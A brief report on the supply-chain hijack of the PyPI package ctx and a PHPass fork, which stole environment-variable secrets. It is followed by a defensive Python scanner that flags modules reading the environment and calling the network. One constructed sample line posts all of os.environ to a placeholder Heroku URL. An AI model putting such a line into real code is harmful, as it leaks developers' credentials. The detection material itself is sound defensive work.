In a software supply chain attack, the PyPI module ctx has been compromised. The safe version of the module, which is downloaded about 20,000 times a week, was replaced with code that exfiltrates the developer's environment variables in order to collect secrets such as Amazon AWS keys.
'ctx' is a minimal Python module that lets developers manipulate dictionary ('dict') objects in a number of ways. Interestingly, after remaining untouched for 8 years, newer versions started appearing on May 15 and contained malicious code. PyPI took down the malicious ctx versions soon afterwards; however, reports still indicate the presence of malicious code within all ctx versions.
Further, versions of a PHPass fork published to Packagist, the PHP/Composer package repository, were altered by the attacker to steal confidential keys and credentials. PHPass is an open-source password hashing framework for PHP applications. Released in 2005, it has been downloaded over 2.5 million times from Packagist. As per reports, malicious commits were made to the PHPass project this week to steal environment variables.
The presence of identical logic and Heroku endpoints within the PyPI and PHP packages indicates that a common threat actor is responsible for both hijacks. While there are some suspicions about the identity of the attackers, experts are not ruling out the possibility of a proof-of-concept (PoC) exercise gone wrong.
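As an added defensive example (not code from the article or from the ctx/PHPass projects), the check below uses Python's ast module to flag a package module that both reads os.environ and makes an outbound network call, the combination the compromised ctx releases exhibited, and lists any hard-coded HTTP endpoints for review. The two sample modules and the Heroku URL in them are constructed placeholders, and the name lists are illustrative rather than a complete detection signature.

```python
import ast

# Illustrative name lists (assumption: not an exhaustive detection signature).
ENV_ATTRS = {"environ", "getenv"}
NET_MODULES = {"requests", "urllib", "http", "socket"}


def _attr_chain(node: ast.AST) -> str:
    """Flatten an a.b.c attribute chain into 'a.b.c'; '' if not a plain chain."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def scan_module(source: str) -> dict:
    """Flag a module that both reads the environment and talks to the network."""
    reads_env, calls_net, endpoints = False, False, []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Attribute) and node.attr in ENV_ATTRS \
                and _attr_chain(node).startswith("os."):
            reads_env = True                      # os.environ / os.getenv
        elif isinstance(node, ast.ImportFrom) and node.module == "os" \
                and any(a.name in ENV_ATTRS for a in node.names):
            reads_env = True                      # from os import environ
        elif isinstance(node, ast.Call) \
                and _attr_chain(node.func).split(".")[0] in NET_MODULES:
            calls_net = True                      # requests.post(...), urlopen(...)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str) \
                and node.value.startswith(("http://", "https://")):
            endpoints.append(node.value)          # hard-coded remote endpoints
    return {"reads_env": reads_env, "calls_net": calls_net,
            "endpoints": endpoints, "suspicious": reads_env and calls_net}


# Constructed sample modules (placeholders, not real package code).
BENIGN = '''
import os
def ctx_from_env():
    return {k: v for k, v in os.environ.items() if k.startswith("CTX_")}
'''
SUSPECT = '''
import os, requests
def helper():
    requests.post("https://placeholder.herokuapp.com/collect", json=dict(os.environ))
'''
```

Run `scan_module` over each module of an unpacked wheel or sdist before installing a new release; a hit is a prompt for manual review, not proof of compromise, since legitimate tooling also reads the environment.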